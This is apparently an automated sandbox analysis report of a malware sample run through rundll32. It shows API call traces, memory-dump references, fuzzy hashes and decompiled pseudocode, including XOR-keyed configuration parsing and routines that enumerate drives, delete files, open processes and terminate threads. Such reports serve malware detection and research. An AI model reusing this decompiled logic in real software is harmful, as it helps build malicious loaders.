                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                                          • String ID:
                                                          • API String ID: 894908221-0
                                                          • Opcode ID: 8ba3162a17671b4e47268fa1ffc444e30a643b03ccbb80c4337ea3c683ea3097
                                                          • Instruction ID: bcc3c19ab844adf677f6caf7f401e34bc8047a8b9a1758269461e46c68de98e5
                                                          • Opcode Fuzzy Hash: 8ba3162a17671b4e47268fa1ffc444e30a643b03ccbb80c4337ea3c683ea3097
                                                          • Instruction Fuzzy Hash: 7EF03A3A101509BADF016E55DC05DEB3BADEF84365B009822BD18EA121DB31DA599BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E5304F(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                          				void* _t17;
                                                          
                                                          				if(_a4 == 0) {
                                                          					L2:
                                                          					return E00E565FA(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                                          				}
                                                          				_t17 = E00E55F4F(_a4, _a8, _a12, _a16, _a20); // executed
                                                          				if(_t17 != 0) {
                                                          					goto L2;
                                                          				}
                                                          				return _t17;
                                                          			}


                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00E55611,3D00E590,80000002,00E5755B,00E53E52,74666F53,4D4C4B48,00E53E52,?,3D00E590,80000002,00E5755B,?), ref: 00E53074
                                                            • Part of subcall function 00E55F4F: SysAllocString.OLEAUT32(00E53E52), ref: 00E55F69
                                                            • Part of subcall function 00E55F4F: SysFreeString.OLEAUT32(00000000), ref: 00E55FA9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreelstrlen
                                                          • String ID:
                                                          • API String ID: 3808004451-0
                                                          • Opcode ID: 976589fe2ddce9ac97c1e7cbaa2bcf97b1009f5f42a22dbc846782111f362fc8
                                                          • Instruction ID: 025efc57b9f6761dca959ee7434c7478ba8e6852230fbfb2c03262194a7230da
                                                          • Opcode Fuzzy Hash: 976589fe2ddce9ac97c1e7cbaa2bcf97b1009f5f42a22dbc846782111f362fc8
                                                          • Instruction Fuzzy Hash: A1F0743200020EFFDF165F90DC45D9A3F6AAB04355F048414BE19650A1D732C9B5EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0558F84B
                                                            • Part of subcall function 055925C7: RegOpenKeyExA.KERNEL32(0558F863,00000000,00000000,00020119,80000001,00000000,?,00000000,7519F560,00000000,?,0558F863,80000001), ref: 0559260E
                                                            • Part of subcall function 055925C7: RegOpenKeyExA.ADVAPI32(0558F863,0558F863,00000000,00020019,80000001,?,0558F863,80000001), ref: 05592624
                                                            • Part of subcall function 055925C7: RegCloseKey.ADVAPI32(80000001,?,0558F863,80000001), ref: 0559266D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Open$Closememset
                                                          • String ID:
                                                          • API String ID: 1685373161-0
                                                          • Opcode ID: b3befba2d152763c9200d144fac1eb4552a1054144e5f10190f8403f1599c482
                                                          • Instruction ID: 70ce0ac16cebfe2258fc4ebe02dfdffeaf5aa842bbbf8462ca979e7b5749d1bb
                                                          • Opcode Fuzzy Hash: b3befba2d152763c9200d144fac1eb4552a1054144e5f10190f8403f1599c482
                                                          • Instruction Fuzzy Hash: 72E0EC34240109B7DB04FE54C855FAD7759BF44394F108015BE0C6E652EB71E660CAA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                            • Part of subcall function 055921EC: ExpandEnvironmentStringsW.KERNEL32(0558F2AD,00000000,00000000,00000001,00000000,00000000,00000000,0558F2AD,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 05592203
                                                            • Part of subcall function 055921EC: ExpandEnvironmentStringsW.KERNEL32(0558F2AD,00000000,00000000,00000000,?,?,?,00000000), ref: 0559221D
                                                          • lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 055714EC
                                                          • lstrlenW.KERNEL32(?,?,77A31120), ref: 055714F8
                                                          • memset.NTDLL ref: 05571540
                                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557155B
                                                          • lstrlenW.KERNEL32(0000002C), ref: 05571593
                                                          • lstrlenW.KERNEL32(?), ref: 0557159B
                                                          • memset.NTDLL ref: 055715BE
                                                          • wcscpy.NTDLL ref: 055715D0
                                                          • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 055715F6
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0557162B
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 05571647
                                                          • FindNextFileW.KERNEL32(?,00000000), ref: 05571660
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 05571672
                                                          • FindClose.KERNEL32(?), ref: 05571687
                                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557169B
                                                          • lstrlenW.KERNEL32(0000002C), ref: 055716BD
                                                          • FindNextFileW.KERNEL32(?,00000000), ref: 05571733
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 05571745
                                                          • FindClose.KERNEL32(?), ref: 05571760
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                                          • String ID:
                                                          • API String ID: 2962561936-0
                                                          • Opcode ID: 97983064937acc7bfedda8c7952d7ab2a0dd2c6f097c939bd1acc18d760fb3e6
                                                          • Instruction ID: 77ac79f95edf7554ef823d2a28b089af062173bfa239c44126831c65936250a1
                                                          • Opcode Fuzzy Hash: 97983064937acc7bfedda8c7952d7ab2a0dd2c6f097c939bd1acc18d760fb3e6
                                                          • Instruction Fuzzy Hash: 1D81AB7060870AAFCB20AF25EC84F2BBBE9FF84300F04482AF49696152DB74D808DF55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575CBE
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575CF0
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575D22
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575D54
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575D86
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575DB8
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575DEA
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575E1C
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575E4E
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575EF5
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575F20
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: b69f22e0555721f9c806ce1ac1647348662bbbf6df44b80aa4ddc3fe71f1ce22
                                                          • Instruction ID: 303b44116fff6ff6bedcbeac1fad9a35b767469de1680cbf73e1efef4aa15afb
                                                          • Opcode Fuzzy Hash: b69f22e0555721f9c806ce1ac1647348662bbbf6df44b80aa4ddc3fe71f1ce22
                                                          • Instruction Fuzzy Hash: 54C181B072521AABD710EB75FC89D6B3F9CBF486507554C26B806C7240FE38EA45DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,69B25F44,00000000,?,0557B496,?,00000000,?,?), ref: 0558FBEC
                                                          • GetLastError.KERNEL32(?,0557B496,?,00000000,?,?), ref: 0558FBFA
                                                          • NtSetInformationProcess.NTDLL ref: 0558FC54
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0558FC93
                                                          • GetProcAddress.KERNEL32(?), ref: 0558FCB4
                                                          • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 0558FD0B
                                                          • CloseHandle.KERNEL32(?), ref: 0558FD21
                                                          • CloseHandle.KERNEL32(?), ref: 0558FD47
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                                          • String ID:
                                                          • API String ID: 3529370251-0
                                                          • Opcode ID: 5bc603001aa9b4e9d41db2c95bf9b4f7ccdd3c7f67bf860df7af169a63e53b8e
                                                          • Instruction ID: 1b540f3e24a3725124edc1d4d2baef007805ec3097aca3f701facb193cdd1434
                                                          • Opcode Fuzzy Hash: 5bc603001aa9b4e9d41db2c95bf9b4f7ccdd3c7f67bf860df7af169a63e53b8e
                                                          • Instruction Fuzzy Hash: E7418E70518346DFD710EF24D849A2ABBE9FF8C348F000D2AF655A2150EB75DA49DB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • wcscpy.NTDLL ref: 05591836
                                                          • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 05591842
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05591853
                                                          • memset.NTDLL ref: 05591870
                                                          • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0559187E
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0559188C
                                                          • GetDriveTypeW.KERNEL32(?), ref: 0559189A
                                                          • lstrlenW.KERNEL32(?), ref: 055918A6
                                                          • wcscpy.NTDLL ref: 055918B8
                                                          • lstrlenW.KERNEL32(?), ref: 055918D2
                                                          • HeapFree.KERNEL32(00000000,?), ref: 055918EB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                                          • String ID:
                                                          • API String ID: 3888849384-0
                                                          • Opcode ID: 1fbad9a78098f83a2f207fabaf3d2354ba8a38210f0438aa5ea38d1a931d187d
                                                          • Instruction ID: 7cf38ac636afbd01a6cd1e584cf74cd9736ef5ac2b8e9ef60205095292522361
                                                          • Opcode Fuzzy Hash: 1fbad9a78098f83a2f207fabaf3d2354ba8a38210f0438aa5ea38d1a931d187d
                                                          • Instruction Fuzzy Hash: B9316D32800119FFCF119BA5EC89CEEBFB9FF49364B114016F005E2011DB39AA49EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E00E5725F(int* __ecx) {
                                                          				char _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* __esi;
                                                          				signed int _t28;
                                                          				signed int _t33;
                                                          				signed int _t39;
                                                          				char* _t45;
                                                          				char* _t46;
                                                          				char* _t47;
                                                          				char* _t48;
                                                          				char* _t49;
                                                          				char* _t50;
                                                          				void* _t51;
                                                          				void* _t52;
                                                          				intOrPtr _t53;
                                                          				signed int _t59;
                                                          				void* _t61;
                                                          				void* _t62;
                                                          				signed int _t64;
                                                          				signed int _t67;
                                                          				signed int _t71;
                                                          				signed int _t75;
                                                          				signed int _t79;
                                                          				signed int _t83;
                                                          				signed int _t87;
                                                          				void* _t92;
                                                          				intOrPtr _t109;
                                                          
                                                          				_t93 = __ecx;
                                                          				_t28 =  *0xe5a2d0; // 0x69b25f44
                                                          				_t2 =  &_v8; // 0xe54540
                                                          				if(E00E56BB2(_t2,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                          					_t4 =  &_v8; // 0xe54540
                                                          					 *0xe5a324 =  *_t4;
                                                          				}
                                                          				_t33 =  *0xe5a2d0; // 0x69b25f44
                                                          				if(E00E56BB2( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                          					_v12 = 2;
                                                          					L57:
                                                          					return _v12;
                                                          				}
                                                          				_t39 =  *0xe5a2d0; // 0x69b25f44
                                                          				_t7 =  &_v8; // 0xe54540
                                                          				if(E00E56BB2( &_v12, _t7, _t39 ^ 0xe60382a5) == 0) {
                                                          					L55:
                                                          					HeapFree( *0xe5a290, 0, _v16);
                                                          					goto L57;
                                                          				} else {
                                                          					_t92 = _v12;
                                                          					if(_t92 == 0) {
                                                          						_t45 = 0;
                                                          					} else {
                                                          						_t87 =  *0xe5a2d0; // 0x69b25f44
                                                          						_t45 = E00E52C90(_t93, _t92, _t87 ^ 0x7895433b);
                                                          					}
                                                          					if(_t45 != 0) {
                                                          						_t10 =  &_v8; // 0xe54540
                                                          						_t93 = _t10;
                                                          						if(StrToIntExA(_t45, 0, _t10) != 0) {
                                                          							_t11 =  &_v8; // 0xe54540
                                                          							 *0xe5a298 =  *_t11;
                                                          						}
                                                          					}
                                                          					if(_t92 == 0) {
                                                          						_t46 = 0;
                                                          					} else {
                                                          						_t83 =  *0xe5a2d0; // 0x69b25f44
                                                          						_t46 = E00E52C90(_t93, _t92, _t83 ^ 0x219b08c7);
                                                          					}
                                                          					if(_t46 != 0) {
                                                          						_t12 =  &_v8; // 0xe54540
                                                          						_t93 = _t12;
                                                          						if(StrToIntExA(_t46, 0, _t12) != 0) {
                                                          							_t13 =  &_v8; // 0xe54540
                                                          							 *0xe5a29c =  *_t13;
                                                          						}
                                                          					}
                                                          					if(_t92 == 0) {
                                                          						_t47 = 0;
                                                          					} else {
                                                          						_t79 =  *0xe5a2d0; // 0x69b25f44
                                                          						_t47 = E00E52C90(_t93, _t92, _t79 ^ 0x31fc0661);
                                                          					}
                                                          					if(_t47 != 0) {
                                                          						_t14 =  &_v8; // 0xe54540
                                                          						_t93 = _t14;
                                                          						if(StrToIntExA(_t47, 0, _t14) != 0) {
                                                          							_t15 =  &_v8; // 0xe54540
                                                          							 *0xe5a2a0 =  *_t15;
                                                          						}
                                                          					}
                                                          					if(_t92 == 0) {
                                                          						_t48 = 0;
                                                          					} else {
                                                          						_t75 =  *0xe5a2d0; // 0x69b25f44
                                                          						_t48 = E00E52C90(_t93, _t92, _t75 ^ 0x0cd926ce);
                                                          					}
                                                          					if(_t48 != 0) {
                                                          						_t16 =  &_v8; // 0xe54540
                                                          						_t93 = _t16;
                                                          						if(StrToIntExA(_t48, 0, _t16) != 0) {
                                                          							_t17 =  &_v8; // 0xe54540
                                                          							 *0xe5a004 =  *_t17;
                                                          						}
                                                          					}
                                                          					if(_t92 == 0) {
                                                          						_t49 = 0;
                                                          					} else {
                                                          						_t71 =  *0xe5a2d0; // 0x69b25f44
                                                          						_t49 = E00E52C90(_t93, _t92, _t71 ^ 0x3cd8b2cb);
                                                          					}
                                                          					if(_t49 != 0) {
                                                          						_t18 =  &_v8; // 0xe54540
                                                          						_t93 = _t18;
                                                          						if(StrToIntExA(_t49, 0, _t18) != 0) {
                                                          							_t19 =  &_v8; // 0xe54540
                                                          							 *0xe5a02c =  *_t19;
                                                          						}
                                                          					}
                                                          					if(_t92 == 0) {
                                                          						_t50 = 0;
                                                          					} else {
                                                          						_t67 =  *0xe5a2d0; // 0x69b25f44
                                                          						_t50 = E00E52C90(_t93, _t92, _t67 ^ 0x2878b929);
                                                          					}
                                                          					if(_t50 == 0) {
                                                          						L41:
                                                          						 *0xe5a2a4 = 5;
                                                          						goto L42;
                                                          					} else {
                                                          						_t20 =  &_v8; // 0xe54540
                                                          						_t93 = _t20;
                                                          						if(StrToIntExA(_t50, 0, _t20) == 0 || _v8 == 0) {
                                                          							goto L41;
                                                          						} else {
                                                          							L42:
                                                          							if(_t92 == 0) {
                                                          								_t51 = 0;
                                                          							} else {
                                                          								_t64 =  *0xe5a2d0; // 0x69b25f44
                                                          								_t51 = E00E52C90(_t93, _t92, _t64 ^ 0x261a367a);
                                                          							}
                                                          							if(_t51 != 0) {
                                                          								_push(_t51);
                                                          								_t61 = 0x10;
                                                          								_t62 = E00E55BBA(_t61);
                                                          								if(_t62 != 0) {
                                                          									_push(_t62);
                                                          									E00E5152E();
                                                          								}
                                                          							}
                                                          							if(_t92 == 0) {
                                                          								_t52 = 0;
                                                          							} else {
                                                          								_t59 =  *0xe5a2d0; // 0x69b25f44
                                                          								_t52 = E00E52C90(_t93, _t92, _t59 ^ 0xb9d404b2);
                                                          							}
                                                          							if(_t52 != 0 && E00E55BBA(0, _t52) != 0) {
                                                          								_t109 =  *0xe5a37c; // 0x51b9630
                                                          								E00E54013(_t109 + 4, _t57);
                                                          							}
                                                          							_t53 =  *0xe5a2d4; // 0x435d5a8
                                                          							_t22 = _t53 + 0xe5b2d2; // 0x51b887a
                                                          							_t23 = _t53 + 0xe5b7c4; // 0x6976612e
                                                          							 *0xe5a320 = _t22;
                                                          							 *0xe5a390 = _t23;
                                                          							HeapFree( *0xe5a290, 0, _t92);
                                                          							_v12 = 0;
                                                          							goto L55;
                                                          						}
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E57304
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E57336
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E57368
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E5739A
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E573CC
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E573FE
                                                          • HeapFree.KERNEL32(00000000,?,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E574A1
                                                          • HeapFree.KERNEL32(00000000,?,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E574B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: @E
                                                          • API String ID: 3298025750-1177087360
                                                          • Opcode ID: 0bf92e6a0eb0176d3f134b40967cbba143866c9b8518603ba0e73e66f9667562
                                                          • Instruction ID: 8bc929ac41f82e2b48b2f99323624f9d9c54018285c86992e62458aa24101b42
                                                          • Opcode Fuzzy Hash: 0bf92e6a0eb0176d3f134b40967cbba143866c9b8518603ba0e73e66f9667562
                                                          • Instruction Fuzzy Hash: A771C374A04204AFCB14DBB5EC89C9F77E9AB48306F282D65BD41F7121E631DD5CAB21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0557E52C: ExpandEnvironmentStringsW.KERNEL32(755506E0,00000000,00000000,755506E0,00000020,80000001,055914F6,?,80000001), ref: 0557E53D
                                                            • Part of subcall function 0557E52C: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 0557E55A
                                                          • FreeLibrary.KERNEL32(?), ref: 055816AD
                                                            • Part of subcall function 0557899F: lstrlenW.KERNEL32(?,00000000,?,?,?,055815F2,?,?), ref: 055789AC
                                                            • Part of subcall function 0557899F: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,055815F2,?,?), ref: 055789D5
                                                            • Part of subcall function 0557899F: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 055789F5
                                                            • Part of subcall function 0557899F: lstrcpyW.KERNEL32(-00000002,?), ref: 05578A10
                                                            • Part of subcall function 0557899F: SetCurrentDirectoryW.KERNEL32(?,?,?,?,055815F2,?,?), ref: 05578A1C
                                                            • Part of subcall function 0557899F: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,055815F2,?,?), ref: 05578A1F
                                                            • Part of subcall function 0557899F: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,055815F2,?,?), ref: 05578A2B
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578A48
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578A62
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578A78
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578A8E
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578AA4
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578ABA
                                                          • FindFirstFileW.KERNEL32(?,?,?,?), ref: 05581603
                                                          • lstrlenW.KERNEL32(?), ref: 0558161F
                                                          • lstrlenW.KERNEL32(?), ref: 05581637
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 05581650
                                                          • lstrcpyW.KERNEL32(00000002), ref: 05581665
                                                            • Part of subcall function 0559295D: lstrlenW.KERNEL32(00000000,00000000,75188250,751469A0,?,?,?,05581675,?,00000000,?), ref: 0559296D
                                                            • Part of subcall function 0559295D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,05581675,?,00000000,?), ref: 0559298F
                                                            • Part of subcall function 0559295D: lstrcpyW.KERNEL32(00000000,00000000), ref: 055929BB
                                                            • Part of subcall function 0559295D: lstrcatW.KERNEL32(00000000,?), ref: 055929CE
                                                          • FindNextFileW.KERNEL32(?,00000010), ref: 0558168D
                                                          • FindClose.KERNEL32(00000002), ref: 0558169B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                                          • String ID:
                                                          • API String ID: 1209511739-0
                                                          • Opcode ID: 7a522a8dd9f062db11d16da359be22962b7ea891418d43d5575df1a563a8e99f
                                                          • Instruction ID: f6c60ef04b3f66c5473a55d634ef74863e04c5604d7aa81a4054a3efe146b293
                                                          • Opcode Fuzzy Hash: 7a522a8dd9f062db11d16da359be22962b7ea891418d43d5575df1a563a8e99f
                                                          • Instruction Fuzzy Hash: 82418D716183069FDB11EF61EC49A2FBBE8FF84704F08092AF491E2150DB34D909DBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000), ref: 05586E66
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05586ECF
                                                          • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 05586EF7
                                                          • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 05586F49
                                                          • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 05586F54
                                                          • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05586F67
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                                          • String ID:
                                                          • API String ID: 499515686-0
                                                          • Opcode ID: 70bd860777077b5fa4842941c7b78c81d506407034707782446e52f77acf19b4
                                                          • Instruction ID: 56ec186f8572d2216cb9ee7c8ec0426e83bce1a69603421161ff5193692bff9b
                                                          • Opcode Fuzzy Hash: 70bd860777077b5fa4842941c7b78c81d506407034707782446e52f77acf19b4
                                                          • Instruction Fuzzy Hash: 3541397191420AEFDF11AFA1DC89ABEBFB9FF10344F1044A6E401B6154DB74DA54EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • LoadLibraryA.KERNEL32(?,00000000,?,00000014,?,05578B0B), ref: 05585549
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05585568
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0558557D
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05585593
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 055855A9
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 055855BF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHeapLibraryLoad
                                                          • String ID:
                                                          • API String ID: 2486251641-0
                                                          • Opcode ID: 05bdd1f202825bd72d15de76ed9506b1d85cf9bb7e556029e59cf954e229a4f7
                                                          • Instruction ID: 70f5a3c075fa3f0bca770388e2dbe576e943aceb9acd87fa7556c42cadca0f77
                                                          • Opcode Fuzzy Hash: 05bdd1f202825bd72d15de76ed9506b1d85cf9bb7e556029e59cf954e229a4f7
